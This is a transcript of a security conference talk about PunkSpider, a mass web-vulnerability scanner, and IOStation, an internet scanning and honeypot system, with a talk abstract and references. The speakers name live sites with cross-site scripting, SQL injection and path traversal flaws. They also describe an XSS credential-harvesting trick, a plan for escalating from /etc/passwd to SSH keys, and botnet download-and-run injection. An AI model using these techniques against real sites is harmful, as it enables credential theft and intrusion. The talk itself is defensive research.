https://www.kernel.org/doc/html/latest/trace/uprobetracer.html 6. Cilium’s XDP documentation, https://docs.cilium.io/en/latest/bpf/#xdp Previous eBPF related talks & projects that helped us build the rootkit: 7. Evil eBPF In-Depth: Practical Abuses of an In-Kernel Bytecode Runtime, Jeff Dileo, DEF CON 27, https://www.defcon.org/html/defcon-27/dc-27-speakers.html#Dileo 8. Process level network security monitoring and enforcement with eBPF, Guillaume Fournier, https://www.sstic.org/2020/presentation/process_level_network_security_monitoring_and_enforcement_with_ebpf/ 9. Runtime Security with eBPF, Sylvain Afchain, Sylvain Baubeau, Guillaume Fournier, https://www.sstic.org/2021/presentation/runtime_security_with_ebpf/ 10. Monitoring and protecting SSH sessions with eBPF, Guillaume Fournier, https://www.sstic.org/2021/presentation/monitoring_and_protecting_ssh_sessions_with_ebpf/
|
10.5446/54209 (DOI)
|
Hello everyone and welcome to Punk Spider and IO Station, making a mess all over the Internet. I am Jason Hopper and I'm the director of research at Complex and I'm here with. I'm Alejandro Ceres, I'm the director of computer network exploitation at Complex. Years ago, Alex invented or developed a system called Punk Spider and I developed something called IO Station. They're both pretty cool tools and we've been dusting them off lately and starting to find some really good ways that we can work together. This talk is just about how they started, how they're going and where they're going to be soon. Yeah. So start off with a little history lesson on what the fuck is a Punk Spider, right? So Punk Spider was a distributed mass web application fuzzing project run over a Hadoop cluster and stored in a distributed backend. Don't worry if you didn't fully understand that, we'll be going through what the fuck that means in a few later slides. It was based on some older technology. You vaguely might remember it as that showdown thing with some SQL injection or some other vulnerabilities about like websites or some shit. That's usually how people remember it. So if you remember something like that, that was Punk Spider. It was presented at Shmucon 2013 and also had the slight guest appearance at DEF CON 2014 as well. So still a long time ago, during this old release, everything was MapReduce, right? If you remember that time of where big technology was the big buzzword instead of fucking like blockchain or whatever, then you remember times of big data, right? And the real game changer there was that we could now crunch data in a distributed manner that was not incredibly difficult, right? So MapReduce was not the most absolutely efficient way to do distributed computing, but it was absolutely one of the easiest and one of the most well-documented ones. Like you can follow simple tutorials and get a pretty decent cluster up and running. So it was actually really cool. And everything back then was MapReduce. So now I'm going to show you my sick UI skills coming up. Nobody get intimidated, you know? This is the old Punk Spider as you can see there is a lot of text. But main thing I wanted to show you is you would type in a URL. You could also make that a kind of like wild card URL, right? So like darknet.sar, for example. By the way, I don't actually go to the site. It used to be a stamp site, might have been taken down, whatever, just don't go. And for those of you that already have, sorry. But what do you see, right? So you see that what's returned, which is at the bottom bit there, is last date scan. Of course, we want to keep our records updated. And a number of web application vulnerabilities that we're fuzzing and scanning for. So obviously this is blind SQL injection, SQL injection, cross-site scripting, path reversal, blah, blah, blah, other very serious vulnerabilities in websites, right? So what we a lot of people do is in a very, in just an extremely open passion, and we had an open API, open UI and everything, is you could search any websites that you wanted and get either aggregate statistics on the vulnerability state of, for example, if you were to do like star.edu, or just kind of do your own research, do your own vulnerability research. I believe by the time this project sort of was shelved for a little bit, we had something like 3.4 million vulnerabilities or something like that. So, it was pretty cool. So now we're out with the old, right? That was old shit, old technology, great technology, good stuff that inspired a lot of the technology that's today, but it was still old, right? So now we're back, we're full on developing, and the biggest change to the project is that appearing gray was by a company called Complex. And Complex has been really amazing about giving us the time, resources, money, backing, legitimacy, everything possible for us to succeed in this project, meaning that really, this thing is flying right now. And I'll get into some of the numbers and we'll get into some of the specifics of what we're checking for in Punx Fighter right now. But this thing is really flying, it's got dedicated engineering time, it's not going back down, but that way, and it's only gonna get better and better. But anyway, that's enough about Punx Fighter. Hopper here is gonna give you some bit of backstory about IOS Station. Yeah, so IOS Station used to be called AmiSense. I apologize if I accidentally say that in a sentence later, but SysAdmins have similarly never liked this program or the system either. It started pretty innocently, and sorry, what it is is just a giant collection of tools that generate and aggregate data and make that available to a user. And it really did start out quite innocently. I was just coming into the cybersecurity space and I started learning about just how crazy the DNS system is, like what you can do with it, the way that it's exploited, and it's such a seemingly simple system, but I couldn't believe the depth. And I was learning about DNS amplification attacks and decided, because the way that I learned things best is by recreating the wheel, that I would just write a DNS server from scratch and I turned it into an amplification sinkhole and then started just getting really interested in that. So I was writing a blog post and I wanted to say, there are this many open recursive DNS servers on the internet, a recursive DNS server, of course, being one that will answer a query for any domain, it'll go out and find the answer up the tree. And so I couldn't find that answer, how many there were on the internet, so I started writing a little Python script to do the scan to find them. And then I realized that although that sounds simple and conceptually it's simple, there really is a lot of subtleties to actually being able to do even a simple scan at scale. And then and then and then it's some giant deep rabbit hole and before I knew it, I had this big system. It's made up of many different parts, but the primary parts are port scanning, it's scanning over 25 ports, there's a lot of like custom extractions that it's doing, in addition to the obvious stuff like banner grabbing and service detection and things like that. On the dark web, we're again doing port scanning, we're trying to tease out any information on additional onion sites that might be hosted on the same VM or definitely any way that we can link it to a surface IP address or domain or something like that to do any attribution for sites that should be taken down from law enforcement. We're also of course crawling all these websites as well, so we're doing dark web mentions for corporate entities and names of other things of interest. And coming from the pure cybersecurity space when we joined Complex, Complex is a cybersecurity company, but they really focus in assessing risk and transforming risk. And so there's a bit of a mind shift that had to happen on my part where some things that are really good for pure cybersecurity actually don't inform risk that well. And there are a lot of other tools that you can use in its place. So I've sort of been working on this system, but with that very much in mind. So a lot of the new kind of directions that I'm, or the new tooling or the new things that I'm interested in really are kind of going down that namespace. And that could be simple things or seemingly simple things, like even just identifying what a corporation has, like what are their assets, where are they? Some corporations honestly can't even answer that question for you. And so doing this in a kind of broad autonomous fashion is really interesting, how that informs other sort of risk metrics. And then looking at kind of proxy measures like what jobs are they hiring, what technologies do they have on those job ads? Like how does that potentially inform, you know, what they're doing in house? We also have some passive sensors, I'll call them. You know, we're monitoring the global certificate transparency logs. So pretty well any SSL certificate that's generated, we get, we record a copy of in near real time. And then we also have another significant component, which is our listening network. So they're basically these low interaction honey pots that have distributed globally and all across the IPv4 spectrum. And they're out there sort of just, you know, listening. They then can identify the early onset of any sort of broad malicious activity or benign activity for that matter. And we can use that as a way to profile the threat in like a sock log, for example, you know, socks have a lot to deal with. They don't need to be chasing down leads that end up just being like Google crawlers or the university of, you know, whatever doing research. Similarly, we can use this to inform a risk score by looking at for any given corporation if we know what their assets are, have any of them been involved in say, being part of a botnet. And if so, for how long? Like, you know, getting popped, you know, once last year is one thing, getting popped and then remaining part of a botnet or whatever for six months is kind of something else that sort of speaks to their detection and remediation policies. Of course, I still have the amplification attack sinkhole. It's not the most, not the most particularly valuable sensor, but you know, it's an oldie and a goodie. And then, you know, honestly, I started learning that if you just start registering with places and looking under some rocks, there's some really good data that you can get for free. I mean, Aaron and who is, sorry, Aaron and Ianna, can provide lots of data. So I collect who is data on IP addresses, which gives you ASN information, organization details and point of contacts. I do get domain who is, but that's such a low value signal. It's almost not worth mentioning. One of the ways that Alex and I are collaborating right now actually is on doing some malware analysis that we capture in our network. So that would be, you know, just doing fingerprints, looking for what sort of network behavior might be going on and trying to integrate that with some of the other tools to get a more broad picture of what's really going on in the internet. And then I also record all information from the DNS root zone files for, you know, like a thousand top level domains, basically anything that's not a country code. And that can be really interesting just to identify suspicious domains as they pop up. They might be used as like a C2 server or phishing or something like that. But then it also can be used in actually identifying assets of a company. The other thing I forgot to mention is, you know, in terms of proxy metrics for the corporations, you can also do things like look at their SEC filings and try to evaluate, you know, for a company of this size in this industry, is their funding and cybersecurity sufficient? And lastly, you know, no cybersecurity tool is complete if you're not pulling in some GUIP data. So this has been a big undertaking for a lot of years. And so to, I started off small, but I needed to rent some servers and things. And I figured I was more interested in spending money on something that I can hold in my hand and have forever for a long time. So instead of buying a lot of cloud services, I actually convinced my wife to allow me to build a small data center in the basement when we were redoing the basement anyway. And so the middle picture here is sort of the, the first version of that where I've got a whole bunch of old desktops and I bought a few used Dell R710s, which bang for your buck are awesome little machines. They can really, they're real little workhorses. And I had to become an internet service provider, which meant registering with the government and applying for a license. I've got a BITS license, which is basic internet telecom service license, which means I can actually sell internet to my neighbors, which is funny, although, you know, there's not really much good reason to do so. It's not exactly cost effective. But I have used some cloud services. So I've done a lot of scanning for years using Linode and Linode's always been really, really supportive. They, you know, have asked me to abide by a number of very reasonable guidelines. And otherwise they, they provide me a lot of, a lot of cover for the very large number of abuse complaints that I bring their way, which is really awesome. So, you know, if by chance anyone from Linode is, is out there or the trust and safety team in particular, who I feel like I'm on a first name basis with, thank you very much. And, you know, one thing I'd like to say about this is that I had the, the lovely opportunity of seeing this project from kind of beginning to end, not, not like there. I don't live with Jason and his wife, but I got to, to, you know, hear about like, hey, I'm thinking of building a data center all the way, you know, to that middle picture, which by the way, just to point out, Jason is a woodworker, metalworker, astronomer, blah, blah, blah. He just fucking everything. And he's good at it too. So he built his own little server rack right there. And you saw that once he surpassed that, he bought a big fucking server rack. So that's, that's just fucking Jason. He's crazy. That's true. I just went, went out and had an insane it is that, you know, he literally built an internet service provider in his basement. And he's like, yeah, no big deal. Just a Saturday. So, anything. That's all. No, it's true. I was quite proud of that little server rack. You know, I used pocket holes and everything, you know, it was fun. But, you know, Alex, we've been talking a big game here, man. What do you say we put our websites where our mouth is? I don't know. That's a terrible joke. Sure. No, I like it. Let's put our websites where our mouth is. All right. So, so, you know, a little preface on this one. So we do have a user interface that has been revamped since the one that Alex has shown. However, it is not released yet. We are releasing AUI in the fall of this year. This is just our sort of internal alpha use version only. Functionally, I'm sure it bears some semblance to what we will just end up releasing, but the one in the fall is gonna be much, much nicer than this even. So, you know, this is punk spider. No good search engine is complete without a giant search bar. So up at the top here, I'm gonna just, I'm just gonna pick like a random domain, something that I don't know, might or may not be a little bit popular and do a little search. And you can see that this kind of tumblr.com website had no vulnerabilities, but, you know, there actually is this one called kickstarter.com, which just so happens to have, I see here, a cross site scripting vulnerability. So we display that, we show the parameter that we're using to abuse this, and then we've got these handy dandy buttons which you can click to test the vulnerability, which will actually open up this webpage with this payload and show you that it actually is working. And then you can also copy a curl command, which is kind of handy if you wanna, you know, change the text or do whatever. We also have this like fairly complex way of scoring these websites. So our thinking is that any one of the vulnerabilities that we're testing for are just insane to have on a website modern times, you know. There's no excuse for it, which means that if you have even one cross site scripting vulnerability, your security posture basically is a giant dumpster fire. So we, I think very appropriately, rank these websites on the scale of one to five dumpster fires. And that's what this, you can kind of see it is here. So another kind of cool thing is a way that we've already started to kind of work together between the two projects is port scan data. So, you know, this is kind of an easy lift, all things considered, but you can click on ports and see that, you know, this one, for example, is running a, it looks like a mail server and an open SSH server. And so we're starting to kind of bring this data sets together and start answering some communal questions. But at the end of the day, what we want this to be is just a giant database that users can search. You can look at your own domains. You can check the domains that you visit or frequent. We want this to be a really awesome security tool for the masses. And there are a few limits that we've had to walk a fine line on. Of course, we don't want people coming here to just like rip off the database and go do whatever. But we'll kind of circle back to that. But yeah, did you have anything to add, Alex? No, no, that was an excellent overview of our user interface. You'll see the little country codes, of course, which, as Jason mentioned, are essential to any security tool. Absolutely. So, you know, Alex, it's funny. Before this talk, I was actually on this website called archive.org, which I know is really, really popular. And this new browser extension I've got has this like, this eight on it. And it's trying to tell me something. Do you know anything about that? I don't. You don't? No, I'm just kidding. I'm sorry. Thanks for the lead, everybody. Yeah, so what we really wanted to do here is, once again, there has a few goals. And we're going to talk about them a little bit later. But one really big goal that we have is that we want to engage not only with the security community. I know we're speaking at DEF CON, and you're probably with the security community. But I think it's really important that we release our stuff out there so that it's ingestible by normal humans. So if you look at the browser plug-in, it's really simple. You may have already guessed this. There are several vulnerabilities on archive.org. It has one dumpster-pire rating, which I believe is appropriate for the number of vulnerabilities found and types of vulnerabilities found. And probably the most important part of this plug-in, frankly, is just that big red spider. So that red button just tells you, hey, this website is dangerous. So anybody that knows something about web security doesn't know anything about web security, et cetera, whatever. Anybody can really use this. One other really cool feature of this plug-in is the trip report. So at the very bottom right of the plug-in, you can see it says trip report. And if you click on that, we've only gone to some sites with cross-site scripting right now. So the results are kind of obvious in terms of what they do. But all we're doing is we're taking basic types of extremely serious web application vulnerabilities and giving you a rolled up kind of view into the last, in my last browsing session, how many websites did I visit that were vulnerable? So that's something that you might want to know. You might want to say, oh, shit, OK, I've been browsing for a week. And I have 1% vulnerable. I want to go back and see who that was and determine if I want to give them more information, right? Like, extremely important for you to know that. So that's what we wanted to do with this browser extension. It's also got this little reset button that you can press that resets your stats. And one particularly important thing, Jason, if you can just go to any random website, I don't know, like Google, is it pretty good one? And open up the extension for me. Yeah. You can see that it's grayed out, right? But it has a, that means that Punkspider doesn't currently have any data on it. Or is it, I'm sorry, Jason. Yeah, I went to Google. So it's been scanned. Yeah, I know it's green. It's been scanned. Oh, fuck me, it's green. OK. So Google has been scanned. So it's going to tell you if you're clean as well. Another state of this particular plugin is gray, which means that we haven't scanned it. If it is gray, then you have the option to submit it for a scan. The scan is really, really, really fast. Like, I've never seen it take more than, like, three or four minutes. So that's currently the plugin. I wanted to show that with a major website, like archive.org, because most of you have probably heard of it. And it's a very off-games website. But we can move on to the next one. Yeah, so just to illustrate the vulnerability here, I'll hit reset. And you can see it executing the payload, printing out the message that we've programmed. Yeah, which is totally elite. Yeah, totally elite. All right, cool. Let's move on to the next one. Lending Tree. All right, go for it. All right, well, these fucking lending tree people. OK, so lending tree, right? What can I say about them? OK, I contacted them on Twitter about what I described to them as a horrible vulnerability that is very obvious in your website. And I did not receive an answer. I can give you a whole rant on my views on fucking responsible disclosure, but I'm going to save it. And just say that, as you can obviously see from Jason loading the page, is that this payload is executed seven times. There's absolutely no filtering going on here. And you can also see that it's just in a basic ass query parameter there, right? And that payload is not very complicated. That's like the cross-site scripting payload, basically, with one thing at it. So there's really no excuse. We contacted Lending Tree. Let's see, a journalist contacted Lending Tree. I contacted, no, I didn't. So two people contacted Lending Tree. This was over a month ago, and we still have received absolutely no response. That to me is just egregious. We are not checking for really super complex second order blind SQL injections to get a fucking out of band shell. We're giving really basic bitch parameter injection here, and just getting it right back. So any simple website scanner, whether it be open source, paid, whatever, should really be able to catch this. Hell, you should be able to catch this shit manually if you're building this website. So it's really an inexcusable one. And because it's a popular website, I felt like I'd go ahead and call them out. Also, well, yeah, I won't pick on them anymore. But yeah, that's all I have to say about Lending Tree. It is funny, too. People complain about you get a pen test team that's not all that good, and all they do is run automated tools, but they're cheap or whatever. When we're talking about cross-site scripting, and a lot of these vulnerabilities, those would still expose these problems. So these companies are not even doing that. Yeah. Yeah. And I mean, even including time of an engineer, that's like 10 minutes. It's not a significant cost either. Anyway, moving on. All right. We've got to move through the next ones, I think, a little bit faster here. But that's OK. This is a good one. All right, not a problem, bud. This is tophas.io. It is a manga website, not about delicious, delicious tapas. But that's OK, right? So as you might have guessed here, if you click on the plug-in or were to check PompSpider or whatever, you can see that it's red. It has a vulnerability in it. It's a cross-site scripting vulnerability. I know that you didn't see an alert box pop up. But let's go through this website real quick. And we'll see what it has to say, right? So pretty basic login page. Use your name, password, login, remember me, et cetera. OK, that's fine, right? So Jason, if you could just scroll all the way down the page for me please. Oh, holy cow. There's like this whole other login form almost completely covered by the footer. What's that? Yeah. So this is the real login form for the web page. Thanks for the lead input. But this is the real login page for the website, right? So what all I've done is, because most cross-site scripting also has HTML injection vulnerability in it, we just pushed it down with a bunch of BR tags, right? So like line break tags. I pushed the real login all the way down and created a fake login up at the top. So what does that allow me to do? That means that I can grab that link that's in the little bar right there, send it to everybody that I know who uses topos.io, whether that be from a Twitter search, a LinkedIn search, whatever search. And it's something that they inherently trust, right? So now I can just sit back there, harvest user names and passwords. I know there's still like some cross-origin restrictions that we need to kind of get around. This isn't a web app hack and talk, so I won't go through those. But this is very easy to just start stealing user names and passwords, is my point. And that sucks. So to anybody in the system that's like to cross-site scripting is not that serious, you're wrong. This is why they're wrong. Yeah, so our tests aren't looking just for cross-site scripting, although there are many of those. We're also doing SQL injection, as Alex has said before. So this is an example of this. So primeinvestor.in, presumably something to do with finances. They've got a login page. They might have pretty sensitive information behind this. And they're not sanitizing their inputs. So we were able to have the web server execute an SQL query just by putting it into like a text form or something like that. It's also kind of interesting that it can also, even the error, can give you back more information. This is clearly a WordPress site. But this is crazy. All they're doing is not sanitizing their input. I mean, most frameworks nowadays won't let you avoid it. I mean, this has got to be like, you almost have to go to your way to have this still be a problem. And it's a huge problem, because this is being executed with the same permissions as the web server itself. And so the web server must have read-write permissions on all the tables related to users and things like that. A website that has this kind of problem, it wouldn't surprise me in the slightest if they had plain text passwords being stored in the database. So potentially, they could just dump this whole thing. At very least, they're probably not salting them or whatever, you could just unhash them or something. But this is a massive problem, really. I mean, this is, yeah. I think you have more to say on that, Alex? I do. We think of sites like this, like primeinvestor.in, as not a huge deal. I mean, whatever, you found some SQL injection. Good job. The problem with that is that we can no longer rely on that argument. So we are in the age of data breaches. We're to a point where data breaches are so prevalent that you have tens of trillions of records sometimes in leak aggregators, meaning that every breach, whether it affects you directly or whether it's a website that you actually care, whether the username and password that you use on that website was sensitive or not, it can still affect you. So websites that have nothing to do with you are now seriously affecting the security of corporations and people in general. So like I said, we're in the age of the data breach. And stuff like this is really inexcusable. To give you an idea, all of the websites that we're showing are in Alexa's top 5,000. You may not have heard of some of these websites, but they are the top websites on the internet. So to have something like this is really just irresponsible, quite frankly. It's completely irresponsible and it's causing major problems across the internet these days. Even the fucking colonial pipeline hack was a credential stuffing attack against their VPN. So that can be completely unrelated websites got breached and then a VPN got breached. We can't have websites like this out there that are just giving usernames and passwords. And we also know now from all these aggregators that are being built and all the password research that's going on that people are fucking terrible at passwords. We get secret 5.1 and that's all of a sudden a fucking secure password. But the other thing is that people reuse their passwords everywhere. So even if it's a site that you don't necessarily care about, if you reuse that password in one single place, somebody could easily find it. And that's all I have to say about that. Yeah. I think the next example is actually a pretty cool one. So this is a traversal attack, which means that we can put in the URL the path to a different file or something that the web server should definitely not be allowed to access or certainly shouldn't be showing to a random website viewer. But we're doing this with the passwords file and Linux. And what that does is it gives us a list of all the different users and groups, including all the system users that this server has. And this is a massive problem because basically this means that we can view files on the server easily. So we could go through this list, find a username that we think is a person or an actual user, and then try to, for example, view their private key, their SSH private key. If we had that, then we could also take a few guesses that maybe if it's on a VM or it's just hosting this website even, maybe it's using some common frameworks like WordPress or something. So WordPress has some default install folders. So maybe we can then go and try to look at the config file and get the database password. So now we could potentially log into the server and access the database freely or the database of another server being hosted on the same VM. I mean, this server is vulnerable, which means really it's putting all of its neighbors at risk. And it's just, again, it's just so silly, like, fix the permissions. Yeah, lastly, this one is just sort of a bit of, beaten a dead horse here, but Kickstarter has a cross-site scripting vulnerability. So I just hit refresh here, you know, punk spider back, nothing shows this off better, but Kickstarter is a bigger organization. They can afford, you know, and like one intern to just go through and check for obvious scripting vulnerabilities and stuff like that. I mean, there's really no reason for this. You give this company money, you have login credentials, you have user data, I mean, I don't even know what else they probably have on the back end, but you know, you're putting people at risk with this. Yeah. Cool, so all right, let's head back to the slides. All right, so, you know, how's this being used, Alex? Wonderful question, Jason. So I feel like we're news anchors or something, but anyway, so you're probably wondering, of course, so we're releasing a fuck ton of vulnerabilities, right? And we're just giving them out for free. So how do you access them, right? A few ways you can use this. One is the browser extension, which you've shown you. Of course, very, very useful. Please download that and use it if you like it. There's a free and open REST API. You can search by vulnerability, domain name, wildcards are all allowed. You have even character wildcards and things like that. So full wildcard search, there's no limitations there. There's a CLI tool that you can use as well, built by a long form Mr. Hopper over here. So you can get stuff like that as well. Soon to come, search engine interface, already in alpha. Jason already showed you some of that. You can search by vulnerability, domain name, wildcards, again, all in play. We don't limit any of that kind of stuff. Recount in G module, 10 tomes, you know him, wonderful man, wonderful software. Hate mail module if you use that. Metasploit module just because everything needs a Metasploit module. And really anything that you all feel that you would like to see with this data. Just choose this ideas. What we can build it or you can submit something that's an open source thing, whatever. But let us know how we can support you to support. Yeah. Help us help you. How to help you basically and we will help you out. Moving on from there. How do we do this? We have this question, a good amount. How do you scan that many websites? Do you have to create your own scanner? Do you have your own fucking internet service provider, et cetera, et cetera. The real answer is it's just a fact of work and a lot of benchmarking. The original punchbinder was built on old technology. So there's a bunch of benchmarking I had to do in terms of what's important. What's important here? Computing power, memory, bandwidth, I owe, all kinds of different things. So there was all kinds of tests that we needed to run to make sure that everything was running like as smoothly and as quickly as possible. We had some creative engineering in there, right? So we repurposed a lot of technology that's really built for search engine technology, data analytics technology, all of that stuff is being used in the backend of punchbinder. It's just we're completely repurposing it for the purposes of offensive security. Last thing that we did is we embraced the cloud, right? Ride the snake meeting, we're addicted. We're all of a sudden addicted to heroin, I mean AWS. Same thing. What's that? Same thing. Same thing, yeah, very similar things we addicted to, both in cost of thousands of dollars a month. AWS is probably more dangerous, but we really embraced it. And we just realized like, the world is kind of moving in that direction. And so we may as well take advantage of that, right? So next slide, please sir. All right, all I want to show you is that we do have metrics and monitoring on the backend of this system. Like I said, it is a very well-funded, well-engineered system at this point. All I'm showing you here at the top left, you'll see the word Ferret. Ferret is our custom built scanner. And all I really wanted to show you here is that there's a bunch of different scan nodes and each of those scan nodes is handling thousands of different websites. So this will get reshuffled and things like that as more data either comes in or this cluster is scaled more, which to me, it looks like it needs to be scaled a little bit more. But it's a good view into the fact that we are doing truly, truly mass distributed scanning. So we can move on to the next slide. Yeah, so actually you could skip this slide. Okay. All right, thanks, sir. So how does this work, right? I want to give you a basic architecture of PongSpider. We have a Kafka queue. Kafka is a simple queuing system. So something comes in and something comes out to a system that's ingesting that, right? The reason that we need a queuing system in order to do this is that we are submitting so many URLs that we need a piece of technology that is distributed and allows us to handle the level of data that we're talking about because we're submitting something like tens of billions of domains, which means hundreds of billions, if not trillions of actual web pages. So queuing technology is really important here and it's used very much with throughout PongSpider. Next slide, please, sir. The ferrets. The ferrets, right. So because that Kafka queue, again, distributed, just gives you a website, we need something to then scan that website. As I mentioned, that application is called ferret, right? So that's our web app pluzzer. Works really quickly, works in a distributed manner. That kind of Kubernetes auto scaling. So we need a lot of ferrets to really be able to scan all of these websites and get all of the data that we want and then present that back to you, which is done in the next slide. And you see that we index these results into two different things. One is RDS for stats. And the other thing is Cloud Search to obviously build the search engine for everybody. So all of this is kind of a simplified view into the entire thing. This feeds back into the queuing system, actually. And yeah, this does back into the queuing system. And can even create more URLs for us to scan and things like that. So that's basically how it works on the backend. What I really wanted to point out is that everything's fucking distributed. Everything is distributed. That's why I have pictures of lots of ferrets, pictures of lots of Kafka, pictures of lots of results, right? Everything is distributed. So we can scale Skies and Linder. Cool. And then we grab more shit from IO station, which Jason's gonna tell you about. Yeah, so running a data center has been a lot of work. It's interesting. It's one of those things where you have to decide where you wanna put your time and effort. I've built this system on Postgres, which is awesome. If there's really specific reason, I'll use something else, but I use Postgres a lot. RabbitMQ I used for years. However, I've got, I had an issue where it would just like disconnect consumers all the time. So all the sensors would be passing messages to it and then the consumers would get disconnected. And then the queues would get so big that they would stop delivering messages, which makes no sense. And then even worse, they'd continue to get big and eventually explode the nodes. So I eventually replaced it with Kafka, which isn't perfect, but I've definitely had much better results overall. And the rest of it is kind of bash and Python because I've been developing this myself to this point. And so kind of simplicity is key. We're moving as much complexity as you can in a lot of ways will make your life a little easier. When it's just a one person operation, that is. So Alex showed his UI, so I thought it tossed mine up here too. It's pretty simple. You type in an IP address, search it, it shows on the map where it's resolving. We've got geoIP and who is data. And then for the port scan data, it shows each port in a different card. And I think I mentioned before, it's scanning over 25 ports. There's a lot of custom extractions that are going on in this and then of course the normal stuff, like service identification and banners and stuff like that. And it's too much to show in one screenshot, but below is where all the listening service data is. And then there's SSL search and things like that. This website has never been public nor probably will it ever be, but you know, can't let someone show the world UI alone. It's so appropriate. So just a really quick little case study, I guess, of something that has been coming across IOS stations. So there's this thing called the Mozzie Botnet. Back in 2019, I started observing it. It's known to other people. It's a really big botnet right now. And basically it's trying to command injection and servers. So these are the two URLs that I see most of the time. And you can see one of them is next file equals netgear.cfg and then it pulls, we get pulls this thing from an IP and port, Mozzie.m is the file name and then it runs it. And then similarly, the other one does the same thing, but Mozzie.a and it executes it slightly differently. But basically this looks like it's trying to do this on netgear equipment at a minimum. And we know from Punk Spider that there are tons of websites that are vulnerable to injection like this. So I started digging a little bit deeper and I used this data to identify where the attacks were coming from and where the malware was being hosted. And interestingly, they were always different IP addresses. Whatever service or sorry, whatever computer was saying, go download and run this malware was never the same IP address as where it was being hosted. And they were mainly hosted in China, like predominantly, definitely some in India. And of course it's a botnet. So it's spread across the world, but there was a huge amount of it coming from China, which was interesting because then when I looked at what sensors the botnet was hitting mostly, it was really heavily hitting India, Japan, Australia, and then to a slightly lesser degree, Canada and Germany, but there were no hits in China, which was kind of funny. And I'm not trying to suggest that this is some sort of like, you know, clever state sponsored piece of malware or anything like that. I just thought it was funny that none of my Chinese servers actually saw any of this and it almost looks like kind of a geopolitical map, you know, a little bit. So yeah, China's suspiciously missing there. You know, I did dig in to look at what devices were actually being part of this botnet and it definitely looked a lot of D-Link, NEC gear and Huawei gear. I saw IP cameras, DVRs, there were some G-Pond devices, which was a little interesting. I didn't really see anything that indicated it was part of any sort of like corporate structure or anything, but the software being used are a lot of web servers, but they're all the like kind of small, lightweight ones that you see being used in sort of embedded devices and things like that, like home routers. And I did notice that the light PD version that I saw a lot of actually 1.4.39 had just a ton of CVEs and many of them were just like blanket, you know, remote code execution, vulnerability and stuff, which was kind of cool. So I did kind of poke around at a few of these, seeing like what they were showing. And I found this kind of cool example. This was just somebody part of the botnet. It has an interface that looks a lot like D-link. I didn't try to log in or anything like that. The links on the top made you log in, but I did dig around the JavaScript because it really wasn't that much actually. And I saw that it was crafting these links. So I went to a few of them directly like sysstatus.asp, for example. And, you know, I guess it doesn't always want you to log in. So if you go to them directly, the login page actually works, or sorry, is bypassed. And I was able to see all the internal DHB tables and all the routing information and all that stuff. And, you know, while this isn't some, you know, egregious vulnerability necessarily on its own, right? It's just kind of illustrating like, this is the kind of nonsense that is still all over the internet. Like I know security's been a hot topic. It's getting better, I think. I think anyway. But there's still craziness like this, where this person's router just like lets you log in and yeah, that's kind of crazy to me. So, you know, we're kind of running out of time here, but I'm sure the burning question in everyone's mind is, where is this all going? So where is it going, Alex? Right, so I just want to recap for everybody, right? So a couple of quick things. Created a hugely scalable system for buzzing a 5% of URLs. We found a bunch of vulnerabilities in major websites. We've even found zero days in popular form technology, right? So obviously the probably most important part of that is that we're releasing it out to you all, the public. And we want to keep these results updated while still continuing to go extremely broad. Our target is still the entire internet. It is, we're not going to let down on that target. We're going to continue engineering until we've reached that target and we can keep the records reasonably updated to a certain degree, right? So how can you kind of help us, right? So I mentioned throwing us ideas, obviously it's really helpful. But download that extension, use that CLI tool, start calling out websites. All of these things are really helpful and not only at the Punksbiter, but part of the mission of Punksbiter really. We built this for you all. So, don't really use it, basically. It's all. As far as IEO station is concerned, I think that continuing to transform my mindset from pure cybersecurity to evaluating risk and risk scoring is really interesting. So I want to continue kind of going down that path. That's not to say that there won't still be the broad internet collection tools that I've been working with and know and love, but it's just that some of the newer features that are coming out probably will be geared towards that. Especially when it comes to critical infrastructure and industrial control systems, which for anyone paying attention to the news lately, I'm sure knows has been a bit of a hot button topic when it comes to certain pipelines, which may not be named. But I think that's a really fascinating area and especially one that's obviously increasing importance. I know there's a lot of utilities and things that have really ignored their cybersecurity posture and they're starting to get bit by it. And anyways, that's something I think we need to look at. And the other one is a little bit more vague, but really trying to identify attacker infrastructure. Like are there things that we can be observing from the outside to identify what an attacker is using and how they're organizing, but maybe early or on the onset or whatever, as early as possible, obviously is better. Are there software that can be probed and identified running across the internet? Are there any sort of particular techniques or patterns or signatures or anything like that that we can extract? This one is not as well thought out, obviously, it's just something that I think we're pretty interested in tracking down long term. But anything that about wraps it up for us. So yeah, if you wanna shoot us an email or whatever, feel free, you can visit our office, but Alex and I won't be there, so. Yeah, thanks everybody for coming and listening to our talk. We really appreciate it. And thank you all for taking the time to listen to us ramble on about this system. And I hope you really enjoyed it. Yeah, thanks everyone. Take it easy. See you guys later.
|
We've been getting asked a lot for "that tool that was like Shodan but for web app vulns.” In particular WTF happened to it? Punkspider (formerly known as PunkSPIDER but renamed because none of us could remember where tf the capital letters go) was taken down a couple of years ago due to multiple ToS issues and threats. It was originally funded by DARPA. We weren’t sure in which direction to keep expanding, and it ended up being a nightmare to sustain. We got banned more than a 15 year old with a fake ID trying to get into a bar. It became a pain and hardly sustainable without a lot of investment in time and money. Each time we got banned it meant thousands of dollars and countless hours moving sh** around. Now we’ve solved our problems and completely re-engineered/expanded the system. It is not only far more efficient with real-time distributed computing and checks for way more vulns, we had to take some creative ways through the woods – this presentation covers both the tool itself and the story of the path we had to take to get where it is, spoiler alert: it involves creating our own ISP and data center in Canada and integrating freely available data that anyone can get but most don’t know is available. Come play with us and see what the wild west of the web looks like and listen to our story, it’s fun and full of angry web developers. We’ll also be releasing at least 10s of thousands of vulnerabilities and will be taking suggestions from the audience on what to search. Fun vulns found get a t-shirt, super fun ones get a hoodie thrown at them. REFERENCES: https://www.youtube.com/watch?v=AbS_EGzkNgI (Shmoo 2013 talk) https://hadoop.apache.org/ https://aws.amazon.com/kubernetes/ https://www.docker.com/ https://www.python.org/ https://www.apache.org/licenses/LICENSE-2.0 https://kafka.apache.org/ https://owasp.org/www-project-top-ten/
|
10.5446/54210 (DOI)
|
